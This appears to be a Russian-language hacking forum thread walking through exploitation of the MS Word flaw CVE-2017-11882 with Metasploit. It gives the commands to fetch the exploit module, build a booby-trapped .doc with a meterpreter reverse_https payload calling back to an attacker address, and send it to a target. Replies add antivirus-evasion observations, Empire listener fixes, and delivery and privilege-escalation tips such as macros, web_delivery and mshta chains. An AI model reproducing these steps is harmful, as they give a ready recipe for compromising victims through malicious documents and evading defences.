CVE-2017-11882 MS Word Metasploit

A

adm2

Green Team
05.07.2017
50
120
BIT
0
Добрый день.
Один доллар (@OneDollar) показал пример эксплуатации уязвимости через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа

Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит

Код: 
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

Запускаем metasploit и выбираем наш модуль.
Код: 
service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882

Просмотрим информацию о модуле
Код: 
info
1.png


Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?

Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
Код: 
set FILENAME /root/exp.doc

Можно поставить и *.rtf, отработает и так и так.

Добавляем пейлоад и запускаем
Код: 
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit

Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.
2.png


AV так же не стоит на месте
Ссылка скрыта от гостей

3.png
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)

Информация дана для ознакомления, спасибо за внимание)

Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
 
  • Нравится
Реакции: TroideN, erlan1749, batu5ai и ещё 9
I

IioS

adm2 сказал(а):
Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?
Нажмите, чтобы раскрыть...
Это наверное та что через формулы работает(про него на Хакере была статья). Хороший метод, сама не смогла найти. Спасибо что помог найти:)
adm2 сказал(а):
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)
Нажмите, чтобы раскрыть...
Может и не все. DDE на данный момент только половина красное. Хотя пока метод через "формулу" будет краснеть, что-то новое найдется чистое.
 
  • Нравится
Реакции: adm2 и Vertigo
z3r0c10wn

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
208
Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил.
 
O

OneDollar

Хорошее дополнение, молодец что подметил!
[doublepost=1511776867,1511776833][/doublepost]
z3r0c10wn сказал(а):
Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил.
Нажмите, чтобы раскрыть...
сессия создана будет, но не рабочая..
 
A

adm2

Green Team
05.07.2017
50
120
BIT
0
За всё время тестов любого ПО я понял, что сессия meterpreter странный предмет, вроде и создана, а вроде и нет =)
 
  • Нравится
Реакции: recrut и woolf1514
z3r0c10wn

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
208
OneDollar сказал(а):
Хорошее дополнение, молодец что подметил!
[doublepost=1511776867,1511776833][/doublepost]
сессия создана будет, но не рабочая..
Нажмите, чтобы раскрыть...
15 минут назад тестил - сессия работает! Офис не пропатчен, ломаный. Винда офф - дефендер с последними апдейтами.
Сессия активна.
 
  • Нравится
Реакции: explorer_traveler и Vertigo
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.
 
T

TST

У кого встречалась траблы с Empire, когда выполняешь execute:
[!] Invalid listener ID or name.
Как ее обойти либо решить?
Screenshot from 2017-11-28 16-01-48.png
 
A

adm2

Green Team
05.07.2017
50
120
BIT
0
TST сказал(а):
У кого встречалась траблы с Empire, когда выполняешь execute:
[!] Invalid listener ID or name.
Как ее обойти либо решить?
Посмотреть вложение 13345
Нажмите, чтобы раскрыть...
Она у тебя просит поднятый листенер)
Выходишь в основное меню
Код: 
main
listeners
uselistener http
execute

А потом уже возвращается в стейджер
2017-11-28_15-15-25.png
 
  • Нравится
Реакции: Vertigo, OneDollar и IioS
ivanov-sv-2015

ivanov-sv-2015

New member
27.01.2017
2
0
BIT
0
При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?
 
A

adm2

Green Team
05.07.2017
50
120
BIT
0
ivanov-sv-2015 сказал(а):
При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?
Нажмите, чтобы раскрыть...
Пха-ха) а о внесении изменений в документ я и не задумывался)) действительно сессия не прилетает)
ну ничего) пройдёт неделька, другая обязательно появится решение)
 
z3r0c10wn

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
208
Если уж играться с последними АВ и другими средствами защиты винды 10ки- стоит обратить внимание на такие классические вещи которые работают как молоток
если говорить за metasploit - exploit/multi/script/web_delivery
если говорить за другие варианты - cmd->mshta->rundll32
Способы доставки - прекрасный макрос в доке работает по прежнему хорошо.
После получения консоли, можно осмотреться в системе и уже пробоваться варианты обхода UAC если есть\ либо другие варианты повышения привилегий. Ну или прогрузить уже другую удобную вам консольку к примеру используя регистрацию в реестре или еще 100500 разных техник.
Но выше указанные две техники на удивление срабатывают там где палятся более сложные на каком нибудь IPSe

______________________________
И еще стоит юзать динамический пул портов. Зачастую много правил фаерволов блокируют все левые не зарегистрированные сервисы на портах до 10 000 . Поэтому вибираем что то в стиле 46553 и уперед!
 
Последнее редактирование:
  • Нравится
Реакции: OneDollar
L

llein

Копался в PowerShell и столкнулся с проблемой, связанной с данным сплоитом при использовании powershell. Возможно ли через него скачать с обменника и запустить файл? Если да, то как это реализуется? Пытался через wget по сокращенной ссылке, но не сработало((
 
A

adm2

Green Team
05.07.2017
50
120
BIT
0
llein сказал(а):
Копался в PowerShell и столкнулся с проблемой, связанной с данным сплоитом при использовании powershell. Возможно ли через него скачать с обменника и запустить файл? Если да, то как это реализуется? Пытался через wget по сокращенной ссылке, но не сработало((
Нажмите, чтобы раскрыть...
Глянь сию серию статей)
https://codeby.net/threads/powershell-dlja-xakera-chast-i.58495/
 
  • Нравится
Реакции: OneDollar
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ